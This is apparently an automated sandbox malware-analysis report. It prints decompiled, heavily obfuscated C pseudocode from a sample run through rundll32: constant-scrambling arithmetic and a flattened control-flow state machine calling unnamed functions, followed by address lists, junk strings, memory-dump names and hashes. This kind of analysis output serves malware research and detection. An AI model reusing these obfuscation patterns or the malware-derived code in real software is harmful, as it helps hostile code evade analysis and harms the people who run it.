				_v2796 = _v2796 + 0x8798;
				_v2796 = _v2796 ^ 0x07c9cae5;
				_v2864 = 0x679d3b;
				_t739 = 0x25;
				_v2864 = _v2864 * 0x7a;
				_v2864 = _v2864 / _t739;
				_v2864 = _v2864 << 0xc;
				_v2864 = _v2864 ^ 0x5a5eda92;
				_v2688 = 0xbc1f25;
				_v2688 = _v2688 << 0xd;
				_v2688 = _v2688 ^ 0x83e15555;
				_v2700 = 0xc3e9b4;
				_v2700 = _v2700 ^ 0x7e7d7a5b;
				_v2700 = _v2700 ^ 0x7ebc2479;
				_v2684 = 0x348655;
				_v2684 = _v2684 + 0xffff5240;
				_v2684 = _v2684 ^ 0x0038d539;
				_v2836 = 0xc8c90d;
				_v2836 = _v2836 | 0x6050777e;
				_v2836 = _v2836 + 0xfffffb37;
				_v2836 = _v2836 << 0xe;
				_v2836 = _v2836 ^ 0x3ea8df0c;
				_v2664 = 0x4ea234;
				_v2664 = _v2664 ^ 0x152f142f;
				_v2664 = _v2664 ^ 0x1568dd81;
				_v2900 = 0xa78742;
				_v2900 = _v2900 * 0x70;
				_v2900 = _v2900 + 0x89c7;
				_v2900 = _v2900 * 0x26;
				_v2900 = _v2900 ^ 0xe13351a3;
				_v2752 = 0x43c729;
				_v2752 = _v2752 * 9;
				_v2752 = _v2752 >> 0xc;
				_v2752 = _v2752 ^ 0x0004a0a7;
				_v2656 = 0x163ba0;
				_v2656 = _v2656 | 0x3b2cca0a;
				_v2656 = _v2656 ^ 0x3b3c61f3;
				_v2800 = 0x539f85;
				_v2800 = _v2800 + 0xffff9927;
				_v2800 = _v2800 >> 0xd;
				_v2800 = _v2800 ^ 0x000ca278;
				_v2892 = 0xaa9f70;
				_v2892 = _v2892 | 0xffd04745;
				_t740 = 0x33;
				_v2892 = _v2892 * 0x48;
				_v2892 = _v2892 + 0xabed;
				_v2892 = _v2892 ^ 0xfe85b4b6;
				_v2728 = 0x66b1f8;
				_v2728 = _v2728 + 0xffffb85a;
				_v2728 = _v2728 + 0xffff17c5;
				_v2728 = _v2728 ^ 0x00666892;
				_v2792 = 0x34b823;
				_v2792 = _v2792 + 0x705f;
				_v2792 = _v2792 | 0x13d147dd;
				_v2792 = _v2792 ^ 0x13fd2081;
				_v2884 = 0x7f5269;
				_v2884 = _v2884 >> 0x10;
				_v2884 = _v2884 + 0xdf59;
				_v2884 = _v2884 ^ 0x086ba2e3;
				_v2884 = _v2884 ^ 0x086346ed;
				_v2784 = 0x4150c;
				_v2784 = _v2784 ^ 0xadfae27c;
				_v2784 = _v2784 << 0xf;
				_v2784 = _v2784 ^ 0x7bb89155;
				_v2860 = 0x3ff4f9;
				_v2860 = _v2860 + 0x97ef;
				_v2860 = _v2860 ^ 0x8a52113e;
				_v2860 = _v2860 * 0x3b;
				_v2860 = _v2860 ^ 0xd244680a;
				_v2920 = 0xf20633;
				_v2920 = _v2920 >> 0xa;
				_v2920 = _v2920 << 6;
				_v2920 = _v2920 | 0x86ded8f3;
				_v2920 = _v2920 ^ 0x86d0715a;
				_v2676 = 0xbc4416;
				_v2676 = _v2676 + 0x253a;
				_v2676 = _v2676 ^ 0x00bded5f;
				_v2928 = 0x15fa7c;
				_v2928 = _v2928 >> 1;
				_v2928 = _v2928 * 0x6e;
				_v2928 = _v2928 >> 4;
				_v2928 = _v2928 ^ 0x00445a38;
				_v2844 = 0xaff44e;
				_v2844 = _v2844 * 0x28;
				_v2844 = _v2844 ^ 0x281c7ad4;
				_v2844 = _v2844 * 0xe;
				_v2844 = _v2844 ^ 0xcf625ac8;
				_v2744 = 0x5c05ba;
				_v2744 = _v2744 << 1;
				_v2744 = _v2744 ^ 0x54918a83;
				_v2744 = _v2744 ^ 0x542c1472;
				_v2904 = 0xa399f4;
				_v2904 = _v2904 / _t740;
				_t741 = 9;
				_v2904 = _v2904 / _t741;
				_v2904 = _v2904 >> 0xb;
				_v2904 = _v2904 ^ 0x000d27e7;
				_v2912 = 0xbe4d5b;
				_v2912 = _v2912 << 2;
				_v2912 = _v2912 >> 8;
				_v2912 = _v2912 + 0xbc5;
				_v2912 = _v2912 ^ 0x000f01bd;
				_v2888 = 0xb7f9c;
				_v2888 = _v2888 ^ 0x23a090a0;
				_v2888 = _v2888 + 0xffffcb65;
				_v2888 = _v2888 + 0xffffb53f;
				_v2888 = _v2888 ^ 0x23a896a2;
				_v2776 = 0xcbb323;
				_v2776 = _v2776 + 0x81c3;
				_v2776 = _v2776 >> 1;
				_v2776 = _v2776 ^ 0x00676393;
				_v2648 = 0x271f91;
				_v2648 = _v2648 + 0xffff9397;
				_v2648 = _v2648 ^ 0x0029f035;
				_v2896 = 0x78618c;
				_v2896 = _v2896 << 0xc;
				_v2896 = _v2896 ^ 0x0a821cde;
				_v2896 = _v2896 + 0xb475;
				_v2896 = _v2896 ^ 0x8c94da80;
				_v2720 = 0xacdc2a;
				_v2720 = _v2720 | 0x57611697;
				_v2720 = _v2720 ^ 0xc01b1ef4;
				_v2720 = _v2720 ^ 0x97fc8dfe;
				_v2668 = 0x55603e;
				_v2668 = _v2668 >> 1;
				_v2668 = _v2668 ^ 0x002dad1d;
				_v2828 = 0xf126f6;
				_t742 = 0x29;
				_v2828 = _v2828 * 0x43;
				_v2828 = _v2828 + 0x8cbb;
				_v2828 = _v2828 ^ 0x3f126f56;
				_v2768 = 0x9c087b;
				_v2768 = _v2768 << 9;
				_v2768 = _v2768 + 0xffffe171;
				_v2768 = _v2768 ^ 0x3813f585;
				_v2880 = 0xb815a3;
				_v2880 = _v2880 ^ 0x72879ea7;
				_v2880 = _v2880 / _t742;
				_v2880 = _v2880 + 0xc3b;
				_v2880 = _v2880 ^ 0x02c00b8a;
				_v2872 = 0xffe9a8;
				_v2872 = _v2872 | 0x05f4b9e7;
				_v2872 = _v2872 + 0xffff2424;
				_v2872 = _v2872 << 7;
				_v2872 = _v2872 ^ 0xff8a2c7e;
				_v2808 = 0x17a98a;
				_t743 = 0x6a;
				_v2808 = _v2808 * 0x35;
				_v2808 = _v2808 + 0x8a0b;
				_v2808 = _v2808 ^ 0x04e27d5d;
				_v2644 = 0x3aca8c;
				_v2644 = _v2644 | 0x1dba2023;
				_v2644 = _v2644 ^ 0x1dba33fd;
				_v2760 = 0xa9a4ba;
				_v2760 = _v2760 ^ 0x6721c4f3;
				_v2760 = _v2760 + 0xffff7b43;
				_v2760 = _v2760 ^ 0x6786e634;
				_v2660 = 0xef5940;
				_t327 =  &_v2660; // 0xef5940
				_v2660 =  *_t327 / _t743;
				_v2660 = _v2660 ^ 0x0008b7a5;
				_v2640 = 0x8c91f9;
				_v2640 = _v2640 + 0x2aa0;
				_v2640 = _v2640 ^ 0x008fd6f1;
				_v2716 = 0xebae10;
				_v2716 = _v2716 + 0x2e93;
				_v2716 = _v2716 >> 3;
				_v2716 = _v2716 ^ 0x0012b27f;
				_v2692 = 0xf4ef17;
				_v2692 = _v2692 ^ 0x14a8ca79;
				_v2692 = _v2692 ^ 0x145940a6;
				_v2712 = 0x90da21;
				_v2712 = _v2712 * 0x5c;
				_v2712 = _v2712 << 6;
				_v2712 = _v2712 ^ 0x039c340b;
				_v2812 = 0x599c06;
				_v2812 = _v2812 | 0x7b64813d;
				_v2812 = _v2812 * 0x3e;
				_v2812 = _v2812 ^ 0xe8633365;
				_v2748 = 0x57b46;
				_t744 = 0x38;
				_v2748 = _v2748 / _t744;
				_v2748 = _v2748 + 0xffffe4a2;
				_v2748 = _v2748 ^ 0xffff7983;
				_v2856 = 0xb347e1;
				_v2856 = _v2856 << 0xf;
				_v2856 = _v2856 + 0xc3e6;
				_v2856 = _v2856 ^ 0xcd6ff0ef;
				_v2856 = _v2856 ^ 0x6e991901;
				_v2756 = 0x3d21e7;
				_v2756 = _v2756 + 0x4052;
				_v2756 = _v2756 + 0xfab6;
				_v2756 = _v2756 ^ 0x0033d413;
				_v2680 = 0xeea097;
				_v2680 = _v2680 * 0x29;
				_v2680 = _v2680 ^ 0x26367c85;
				_v2852 = 0x9a84c7;
				_v2852 = _v2852 << 4;
				_v2852 = _v2852 + 0x5305;
				_v2852 = _v2852 * 0x47;
				_v2852 = _v2852 ^ 0xadc8f5b7;
				_v2736 = 0x1d92c0;
				_v2736 = _v2736 ^ 0x4e3febcd;
				_v2736 = _v2736 ^ 0x2a5eeaad;
				_v2736 = _v2736 ^ 0x647637b5;
				_v2916 = 0x7a6f6e;
				_v2916 = _v2916 << 3;
				_v2916 = _v2916 | 0x74549758;
				_v2916 = _v2916 * 0x5e;
				_v2916 = _v2916 ^ 0x014df6ca;
				_v2820 = 0x88f64;
				_v2820 = _v2820 << 0xb;
				_v2820 = _v2820 ^ 0x8d7f89a1;
				_v2820 = _v2820 ^ 0xc90720e1;
				_v2672 = 0x9d7b6a;
				_v2672 = _v2672 * 0x74;
				_v2672 = _v2672 ^ 0x47521deb;
				_v2868 = 0x2a980b;
				_v2868 = _v2868 << 2;
				_v2868 = _v2868 * 0x37;
				_v2868 = _v2868 * 0x45;
				_v2868 = _v2868 ^ 0xdda58f8d;
				_v2704 = 0xd94882;
				_v2704 = _v2704 >> 7;
				_v2704 = _v2704 ^ 0x000dd1c5;
				_v2908 = 0x8685cf;
				_v2908 = _v2908 >> 6;
				_v2908 = _v2908 + 0x478f;
				_v2908 = _v2908 | 0x9a4acbdf;
				_v2908 = _v2908 ^ 0x9a416c75;
				_v2724 = 0x3983d7;
				_v2724 = _v2724 ^ 0xaf8ece10;
				_v2724 = _v2724 + 0xfffffe8c;
				_v2724 = _v2724 ^ 0xafb9f002;
				_v2652 = 0xb48fd9;
				_v2652 = _v2652 >> 7;
				_v2652 = _v2652 ^ 0x0003170e;
				_v2732 = 0x26e706;
				_v2732 = _v2732 + 0xffff7cb3;
				_v2732 = _v2732 << 7;
				_v2732 = _v2732 ^ 0x13307998;
				_v2840 = 0xdaf489;
				_v2840 = _v2840 ^ 0x20b9ad9c;
				_v2840 = _v2840 + 0xa5fa;
				_v2840 = _v2840 ^ 0x206e4944;
				_v2848 = 0x15799;
				_v2848 = _v2848 + 0xffffbd76;
				_v2848 = _v2848 | 0x84cc3dff;
				_v2848 = _v2848 ^ 0x84c4ee28;
				_v2740 = 0x344f78;
				_v2740 = _v2740 | 0xed30b44e;
				_v2740 = _v2740 + 0x582d;
				_v2740 = _v2740 ^ 0xed3a4892;
				_v2764 = 0x3aec11;
				_t745 = 0x14;
				_v2764 = _v2764 * 0x24;
				_v2764 = _v2764 * 0xd;
				_v2764 = _v2764 ^ 0x6bb19aaa;
				_v2772 = 0xa2a4e3;
				_v2772 = _v2772 * 0x54;
				_v2772 = _v2772 + 0xd74c;
				_v2772 = _v2772 ^ 0x35517ae7;
				_v2780 = 0xc7cad3;
				_v2780 = _v2780 ^ 0xe16f0727;
				_v2780 = _v2780 + 0xa55f;
				_v2780 = _v2780 ^ 0xe1ad612a;
				_v2788 = 0x30bac2;
				_v2788 = _v2788 << 2;
				_v2788 = _v2788 * 0x19;
				_v2788 = _v2788 ^ 0x130f6af8;
				_v2708 = 0x5b81b7;
				_v2708 = _v2708 << 0xd;
				_v2708 = _v2708 ^ 0x7032fecb;
				_v2816 = 0xe0b39a;
				_v2816 = _v2816 + 0xf3c;
				_v2816 = _v2816 * 0x29;
				_v2816 = _v2816 ^ 0x23fa5b32;
				_v2832 = 0xb37143;
				_v2832 = _v2832 + 0xffff99de;
				_v2832 = _v2832 / _t745;
				_v2832 = _v2832 | 0xcb90c15e;
				_v2832 = _v2832 ^ 0xcb9cb56b;
				_v2824 = 0xf7e429;
				_v2824 = _v2824 << 0x10;
				_v2824 = _v2824 ^ 0x4b169193;
				_v2824 = _v2824 ^ 0xaf30b470;
				_t703 = E007B7CDB(_t745);
				_t797 = _v2708;
				_t736 = _t703;
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t811 = _t798 - 0xa06a9d5;
							if(_t811 <= 0) {
								break;
							}
							__eflags = _t798 - 0xae01df1;
							if(__eflags == 0) {
								_push(_v2740);
								_push(0);
								_push(_t745);
								_push(1);
								_push(0);
								_push(_v2848);
								_t745 = _v2732;
								_push( &_v524);
								E007AAB87(_t745, _v2840, __eflags);
								_t804 = _t804 + 0x1c;
								_t798 = 0xfe27958;
								_t707 = 0x8a3cf08;
								goto L24;
							} else {
								__eflags = _t798 - 0xb104717;
								if(_t798 == 0xb104717) {
									_t745 = _v2748;
									_t708 = E007A4816(_t745, _v2632, _v2856, _v2636, _v2756, _v2680);
									_t797 = _t708;
									_t804 = _t804 + 0x10;
									__eflags = _t708;
									_t707 = 0x8a3cf08;
									_t798 =  !=  ? 0x8a3cf08 : 0xa06a9d5;
									continue;
								} else {
									__eflags = _t798 - 0xe3ea8aa;
									if(_t798 == 0xe3ea8aa) {
										return E007B1E67(_v2708, _v2816, _v2832, _v2824, _v2628);
									}
									__eflags = _t798 - 0xfe27958;
									if(_t798 != 0xfe27958) {
										goto L24;
									} else {
										E007B8519(_v2764, _v2772, _t797);
										_pop(_t745);
										_t798 = 0xa06a9d5;
										while(1) {
											L1:
											goto L2;
										}
									}
								}
							}
							L27:
							return _t717;
						}
						if(_t811 == 0) {
							E007B8519(_v2780, _v2788, _v2636);
							_pop(_t745);
							_t798 = 0xe3ea8aa;
							while(1) {
								L1:
								goto L2;
							}
						}
						if(_t798 == 0xce4571) {
							_push(_v2700);
							_push(_v2696);
							_push(_v2688);
							_t745 = _v2796;
							_push( &_v1044);
							E007B46BB(_t745, _v2864);
							_t804 = _t804 - 0xc + 0x1c;
							_t798 = 0x2f0d176;
							while(1) {
								L1:
								goto L2;
							}
						}
						if(_t798 == 0x277711d) {
							_v2624 = E007A59E9();
							_v2620 = 2 + E007ACB52(_v2668, _t714, _v2828, _v2768, _v2880) * 2;
							_t745 =  &_v2628;
							_t717 = E007B8727(_t745, _v2804, _v2668, _v2872, _v2808, _v2668, _v2644, _t736, _t736, _v2760, _t736, _v2660, _v2640);
							_t804 = _t804 + 0x38;
							__eflags = _t717;
							if(__eflags != 0) {
								_t798 = 0x47e8611;
								goto L1;
							}
						} else {
							if(_t798 == 0x2f0d176) {
								E007BDA22(_v2684, _v2836, __eflags, _v2664,  &_v2084, _t745, _v2900);
								 *((short*)(E007AB6CF( &_v2084, _v2752, _v2656, _v2800))) = 0;
								E007A8969(_v2892,  &_v1564, __eflags, _v2728, _v2792);
								_push(_v2860);
								_push(_v2784);
								E007A47CE( &_v2084, _v2920, _v2884, _v2676, _v2928, E007BDCF7(_v2884, 0x7a1308, __eflags),  &_v1564, _v2844, _v2744);
								E007AA8B0(_v2904, _t722, _v2912);
								_t745 = _v2888;
								_t717 = E007AEA99(_t745, _t803, _v2776, _v2648,  &_v2604, _v2896);
								_t804 = _t804 + 0x5c;
								__eflags = _t717;
								if(__eflags != 0) {
									_t798 = 0x277711d;
									while(1) {
										L1:
										goto L2;
									}
								}
							} else {
								if(_t798 == 0x47e8611) {
									_t745 =  &_v2636;
									E007BDEDC(_t745, _v2716, _v2692, _v2712,  &_v2628, _v2812);
									_t804 = _t804 + 0x10;
									asm("sbb esi, esi");
									_t798 = (_t798 & 0xfcd19e6d) + 0xe3ea8aa;
									while(1) {
										L1:
										goto L2;
									}
								} else {
									_t816 = _t798 - _t707;
									if(_t798 != _t707) {
										goto L24;
									} else {
										_push(_v2916);
										_push(_v2736);
										_t730 = E007BDCF7(_v2852, 0x7a13f8, _t816);
										_pop(_t758);
										E007B453F(_v2820, _t816, _v2672, _t730, _v2868,  &_v1044, _t758, _v2704, _v2908, _t797,  &_v2604);
										_t804 = _t804 + 0x24;
										E007AA8B0(_v2724, _t730, _v2652);
										_pop(_t745);
										_t798 = 0xae01df1;
										while(1) {
											L1:
											goto L2;
										}
									}
								}
							}
						}
						goto L27;
						L24:
						__eflags = _t798 - 0xe39a6fa;
					} while (__eflags != 0);
					return _t707;
				}
			}

0x007b4b8d
0x007b4b97
0x007b4ba2
0x007b4bad
0x007b4bb8
0x007b4bc3
0x007b4bce
0x007b4bd9
0x007b4be1
0x007b4bec
0x007b4bf7
0x007b4bff
0x007b4c04
0x007b4c09
0x007b4c11
0x007b4c19
0x007b4c21
0x007b4c33
0x007b4c35
0x007b4c3a
0x007b4c3f
0x007b4c45
0x007b4c4d
0x007b4c55
0x007b4c60
0x007b4c68
0x007b4c73
0x007b4c7e
0x007b4c8b
0x007b4c8c
0x007b4c96
0x007b4c9a
0x007b4c9f
0x007b4ca7
0x007b4cb2
0x007b4cba
0x007b4cc5
0x007b4cd0
0x007b4cdb
0x007b4ce6
0x007b4cf1
0x007b4cfc
0x007b4d07
0x007b4d0f
0x007b4d17
0x007b4d1f
0x007b4d24
0x007b4d2c
0x007b4d37
0x007b4d42
0x007b4d4d
0x007b4d5a
0x007b4d5e
0x007b4d6b
0x007b4d6f
0x007b4d77
0x007b4d8a
0x007b4d91
0x007b4d99
0x007b4da4
0x007b4daf
0x007b4dba
0x007b4dc5
0x007b4dd0
0x007b4ddb
0x007b4de3
0x007b4df0
0x007b4df8
0x007b4e07
0x007b4e0a
0x007b4e0e
0x007b4e16
0x007b4e1e
0x007b4e29
0x007b4e34
0x007b4e3f
0x007b4e4a
0x007b4e55
0x007b4e60
0x007b4e6b
0x007b4e76
0x007b4e7e
0x007b4e83
0x007b4e8b
0x007b4e93
0x007b4e9b
0x007b4ea6
0x007b4eb1
0x007b4eb9
0x007b4ec4
0x007b4ecc
0x007b4ed4
0x007b4ee1
0x007b4ee5
0x007b4eed
0x007b4ef5
0x007b4efa
0x007b4eff
0x007b4f07
0x007b4f0f
0x007b4f1a
0x007b4f25
0x007b4f30
0x007b4f38
0x007b4f41
0x007b4f45
0x007b4f4a
0x007b4f52
0x007b4f5f
0x007b4f63
0x007b4f70
0x007b4f74
0x007b4f7c
0x007b4f87
0x007b4f8e
0x007b4f99
0x007b4fa4
0x007b4fb4
0x007b4fbc
0x007b4fbf
0x007b4fc3
0x007b4fc8
0x007b4fd0
0x007b4fd8
0x007b4fdd
0x007b4fe2
0x007b4fea
0x007b4ff2
0x007b4ffa
0x007b5002
0x007b500a
0x007b5012
0x007b501a
0x007b5025
0x007b5032
0x007b5039
0x007b5044
0x007b504f
0x007b505a
0x007b5065
0x007b506d
0x007b5072
0x007b507a
0x007b5082
0x007b508a
0x007b5095
0x007b50a0
0x007b50ab
0x007b50b6
0x007b50c1
0x007b50c8
0x007b50d3
0x007b50e2
0x007b50e5
0x007b50e9
0x007b50f1
0x007b50f9
0x007b5104
0x007b510c
0x007b5117
0x007b5122
0x007b512a
0x007b513a
0x007b513e
0x007b5146
0x007b514e
0x007b5156
0x007b515e
0x007b5166
0x007b516b
0x007b5173
0x007b5186
0x007b5187
0x007b518e
0x007b5199
0x007b51a4
0x007b51af
0x007b51ba
0x007b51c5
0x007b51d0
0x007b51db
0x007b51e6
0x007b51f1
0x007b51fc
0x007b5205
0x007b520c
0x007b5217
0x007b5222
0x007b522d
0x007b5238
0x007b5243
0x007b524e
0x007b5256
0x007b5261
0x007b526c
0x007b5277
0x007b5282
0x007b5295
0x007b529c
0x007b52a4
0x007b52af
0x007b52ba
0x007b52cd
0x007b52d4
0x007b52e1
0x007b52f5
0x007b52f8
0x007b52ff
0x007b530a
0x007b5315
0x007b531d
0x007b5322
0x007b532a
0x007b5332
0x007b533a
0x007b5345
0x007b5350
0x007b535b
0x007b5366
0x007b5379
0x007b5380
0x007b538b
0x007b5393
0x007b5398
0x007b53a5
0x007b53a9
0x007b53b1
0x007b53bc
0x007b53c7
0x007b53d2
0x007b53dd
0x007b53e5
0x007b53ea
0x007b53f7
0x007b53fb
0x007b5403
0x007b540e
0x007b5416
0x007b5421
0x007b542c
0x007b543f
0x007b5446
0x007b5451
0x007b5459
0x007b5463
0x007b546c
0x007b5470
0x007b5478
0x007b5483
0x007b548b
0x007b5496
0x007b549e
0x007b54a3
0x007b54ab
0x007b54b3
0x007b54bb
0x007b54c6
0x007b54d1
0x007b54dc
0x007b54e7
0x007b54f2
0x007b54fa
0x007b5505
0x007b5510
0x007b551b
0x007b5523
0x007b552e
0x007b553e
0x007b5546
0x007b554e
0x007b5556
0x007b5568
0x007b5570
0x007b5578
0x007b5580
0x007b558b
0x007b5596
0x007b55a1
0x007b55ac
0x007b55c1
0x007b55c2
0x007b55d1
0x007b55d8
0x007b55e3
0x007b55f6
0x007b55fd
0x007b5608
0x007b5613
0x007b561e
0x007b5629
0x007b5634
0x007b563f
0x007b564a
0x007b565a
0x007b5661
0x007b566c
0x007b5677
0x007b567f
0x007b568a
0x007b5695
0x007b56a8
0x007b56af
0x007b56ba
0x007b56c2
0x007b56d0
0x007b56d4
0x007b56dc
0x007b56e4
0x007b56ec
0x007b56f1
0x007b56f9
0x007b5709
0x007b570e
0x007b5715
0x007b5717
0x007b5717
0x007b571c
0x007b571c
0x007b571c
0x007b571c
0x007b5722
0x00000000
0x00000000
0x007b5a30
0x007b5a36
0x007b5ac0
0x007b5ace
0x007b5ad0
0x007b5ad1
0x007b5ad3
0x007b5ad5
0x007b5ae0
0x007b5ae7
0x007b5ae8
0x007b5aed
0x007b5af0
0x007b5af5
0x00000000
0x007b5a3c
0x007b5a3c
0x007b5a42
0x007b5a9b
0x007b5aa2
0x007b5aa7
0x007b5aa9
0x007b5aac
0x007b5ab3
0x007b5ab8
0x00000000
0x007b5a44
0x007b5a44
0x007b5a4a
0x00000000
0x007b5b2d
0x007b5a50
0x007b5a56
0x00000000
0x007b5a5c
0x007b5a6b
0x007b5a70
0x007b5a71
0x007b5717
0x007b5717
0x00000000
0x007b5717
0x007b5717
0x007b5a56
0x007b5a42
0x007b5b3a
0x007b5b3a
0x007b5b3a
0x007b5728
0x007b5a20
0x007b5a25
0x007b5a26
0x007b5717
0x007b5717
0x00000000
0x007b5717
0x007b5717
0x007b5734
0x007b59ce
0x007b59dc
0x007b59e3
0x007b59ee
0x007b59f8
0x007b59f9
0x007b59fe
0x007b5a01
0x007b5717
0x007b5717
0x00000000
0x007b5717
0x007b5717
0x007b5740
0x007b5948
0x007b597a
0x007b59ad
0x007b59b4
0x007b59b9
0x007b59bc
0x007b59be
0x007b59c4
0x00000000
0x007b59c4
0x007b5746
0x007b574c
0x007b584c
0x007b5889
0x007b5890
0x007b5895
0x007b589e
0x007b58e5
0x007b58f4
0x007b5918
0x007b591c
0x007b5921
0x007b5924
0x007b5926
0x007b592c
0x007b5717
0x007b5717
0x00000000
0x007b5717
0x007b5717
0x007b5752
0x007b5758
0x007b57f8
0x007b580d
0x007b5812
0x007b5817
0x007b581f
0x007b5717
0x007b5717
0x00000000
0x007b5717
0x007b575e
0x007b575e
0x007b5760
0x00000000
0x007b5766
0x007b5766
0x007b576f
0x007b577a
0x007b5780
0x007b57ba
0x007b57bf
0x007b57d2
0x007b57d7
0x007b57d8
0x007b5717
0x007b5717
0x00000000
0x007b5717
0x007b5717
0x007b5760
0x007b5758
0x007b574c
0x00000000
0x007b5afa
0x007b5afa
0x007b5afa
0x00000000
0x007b571c

Strings

R@, xrefs: 007B5345
:%, xrefs: 007B4F1A
8ZD, xrefs: 007B4F3C
G4%>, xrefs: 007B4C11
e3c, xrefs: 007B52D4
!=, xrefs: 007B533A
[z}~, xrefs: 007B4CD0
zQ5, xrefs: 007B5608
_p, xrefs: 007B4E55
xO4, xrefs: 007B5580
@Y, xrefs: 007B51FC
', xrefs: 007B4FC8
-X, xrefs: 007B5596
8ZD, xrefs: 007B5701
DIn , xrefs: 007B554E
~wP`, xrefs: 007B4D0F
>`U, xrefs: 007B50B6

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: -X$8ZD$8ZD$:%$>`U$@Y$DIn $G4%>$R@$[z}~$_p$e3c$xO4$~wP`$!=$'$zQ5
API String ID: 1514166925-1547002888
Opcode ID: d1a415f900e49305e6ce57e85a106376dc4713f5f89bbb3347eefcdaa264c833
Instruction ID: fd2694eac3d012a284b6a49be4afbef76aee9634a751e14058edd7f37c491d1f
Opcode Fuzzy Hash: d1a415f900e49305e6ce57e85a106376dc4713f5f89bbb3347eefcdaa264c833
Instruction Fuzzy Hash: 2172F071408381DBD3B9CF25C58AB8BBBE1BBC4318F108A1DE1DA96260D7B48949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 007B2550 Relevance: 21.1, Strings: 16, Instructions: 1077
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E007B2550() {
				signed int _v28;
				char _v36;
				char _v84;
				signed int _v100;
				signed int _v104;
				signed int _v112;
				signed int _v124;
				signed int _v140;
				intOrPtr _v144;
				char _v152;
				signed int _v172;
				char _v180;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				unsigned int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				unsigned int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				unsigned int _v484;
				unsigned int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				unsigned int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				unsigned int _v532;
				signed int _v536;
				signed int _v540;
				unsigned int _v544;
				signed int _v548;
				unsigned int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				unsigned int _v576;
				signed int _v580;
				signed int _v584;
				unsigned int _v588;
				unsigned int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _t1114;
				signed int _t1118;
				signed int _t1122;
				signed int _t1124;
				signed int _t1125;
				signed int _t1130;
				void* _t1134;
				signed int _t1141;
				signed int _t1190;
				signed int _t1191;
				signed int _t1193;
				signed int _t1194;
				signed int _t1195;
				signed int _t1196;
				signed int _t1197;
				signed int _t1198;
				signed int _t1199;
				signed int _t1200;
				signed int _t1201;
				signed int _t1202;
				signed int _t1203;
				signed int _t1204;
				signed int _t1205;
				signed int _t1206;
				signed int _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1214;
				signed int _t1215;
				signed int _t1313;
				signed int _t1314;
				signed int _t1317;
				signed int _t1343;
				void* _t1345;
				void* _t1348;
				void* _t1349;
				void* _t1350;

				_t1345 = (_t1343 & 0xfffffff8) - 0x278;
				_v372 = 0xaca17;
				_v372 = _v372 << 9;
				_v372 = _v372 ^ 0xc9927700;
				_v372 = _v372 ^ 0xdc065802;
				_v560 = 0xa158a0;
				_v560 = _v560 + 0xffff5dcd;
				_v560 = _v560 ^ 0x175bafac;
				_v560 = _v560 + 0xffff9e49;
				_v560 = _v560 ^ 0x17fab80a;
				_v288 = 0xd4a9a6;
				_v288 = _v288 >> 3;
				_v288 = _v288 ^ 0x001a9534;
				_v504 = 0xe9a5d3;
				_v504 = _v504 << 0xa;
				_v504 = _v504 | 0xea5982c0;
				_t1190 = 0x5f;
				_v504 = _v504 / _t1190;
				_v504 = _v504 ^ 0x028f5db6;
				_t1317 = 0x5d794ec;
				_v304 = 0x85b0a3;
				_v304 = _v304 | 0x2bca024a;
				_v304 = _v304 ^ 0x2bcc012b;
				_v556 = 0x1ecc82;
				_v556 = _v556 | 0xf08df0d8;
				_v556 = _v556 + 0xa531;
				_v556 = _v556 ^ 0xfe698427;
				_v556 = _v556 ^ 0x0ecdaa65;
				_v300 = 0x8f610e;
				_v300 = _v300 + 0xfe33;
				_v300 = _v300 ^ 0x0094e207;
				_v600 = 0x1cab4a;
				_t1193 = 0x18;
				_v600 = _v600 / _t1193;
				_v600 = _v600 + 0xffff3801;
				_v600 = _v600 + 0x515c;
				_v600 = _v600 ^ 0x0001e7c9;
				_v568 = 0xbab742;
				_v568 = _v568 + 0xcc5d;
				_v568 = _v568 | 0x5c48aa02;
				_t1194 = 0x5e;
				_v568 = _v568 / _t1194;
				_v568 = _v568 ^ 0x00f9db2d;
				_v576 = 0x767b63;
				_v576 = _v576 >> 3;
				_v576 = _v576 + 0xd487;
				_v576 = _v576 >> 0x10;
				_v576 = _v576 ^ 0x00061026;
				_v628 = 0xe4759e;
				_v628 = _v628 ^ 0xa26bb658;
				_v628 = _v628 * 0x1d;
